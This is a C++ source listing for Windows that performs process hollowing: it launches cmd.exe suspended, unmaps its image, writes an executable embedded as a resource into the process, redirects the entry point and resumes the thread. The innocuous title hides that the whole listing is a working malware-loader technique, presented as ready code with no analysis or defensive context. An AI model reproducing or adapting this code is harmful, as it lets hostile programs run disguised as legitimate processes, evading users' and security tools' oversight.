Creating a process in memory

1. #include "stdafx.h"
2. #include <Windows.h>
3. #include "createfrommemory.h"
4.  
5. extern "C" NTSYSAPI LONG NTAPI ZwUnmapViewOfSection(HANDLE, PVOID);
6.  
7. ULONG protect(ULONG characteristics)
8. {
9.     static const ULONG mapping[]
10.         = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, PAGE_EXECUTE_READ,
11.            PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_READWRITE, PAGE_EXECUTE_READWRITE};
12.  
13.     return mapping[characteristics >> 29];
14. }
15.  
16. int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
17. {
18.     PROCESS_INFORMATION pi;
19.     STARTUPINFO si = {sizeof si};
20.  
21.     CreateProcess(0, L"cmd", 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, &si, &pi);
22.  
23.     CONTEXT context = {CONTEXT_INTEGER};
24.  
25.     GetThreadContext(pi.hThread, &context);
26.  
27.     PVOID x;
28.     ReadProcessMemory(pi.hProcess, PCHAR(context.Ebx) + 8, &x, sizeof x, 0);
29.  
30.     ZwUnmapViewOfSection(pi.hProcess, x);
31.  
32.     PVOID p = LockResource(LoadResource(0, FindResource(0, L"Image", L"EXE")));
33.  
34.     PIMAGE_NT_HEADERS nt = PIMAGE_NT_HEADERS(PCHAR(p) + PIMAGE_DOS_HEADER(p)->e_lfanew);
35.  
36.     PVOID q = VirtualAllocEx(pi.hProcess,
37.                              PVOID(nt->OptionalHeader.ImageBase),
38.                              nt->OptionalHeader.SizeOfImage,
39.                              MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
40.  
41.     WriteProcessMemory(pi.hProcess, q, p, nt->OptionalHeader.SizeOfHeaders, 0);
42.  
43.     PIMAGE_SECTION_HEADER sect = IMAGE_FIRST_SECTION(nt);
44.  
45.     for (ULONG i = 0; i < nt->FileHeader.NumberOfSections; i++) {
46.  
47.         WriteProcessMemory(pi.hProcess,
48.                            PCHAR(q) + sect[i].VirtualAddress,
49.                            PCHAR(p) + sect[i].PointerToRawData,
50.                            sect[i].SizeOfRawData, 0);
51.  
52.         ULONG x;
53.  
54.         VirtualProtectEx(pi.hProcess, PCHAR(q) + sect[i].VirtualAddress, sect[i].Misc.VirtualSize,
55.                          protect(sect[i].Characteristics), &x);
56.     }
57.  
58.     WriteProcessMemory(pi.hProcess, PCHAR(context.Ebx) + 8, &q, sizeof q, 0);
59.  
60.     context.Eax = ULONG(q) + nt->OptionalHeader.AddressOfEntryPoint;
61.  
62.     SetThreadContext(pi.hThread, &context);
63.  
64.     ResumeThread(pi.hThread);
65.  
66.     return 0;
67. }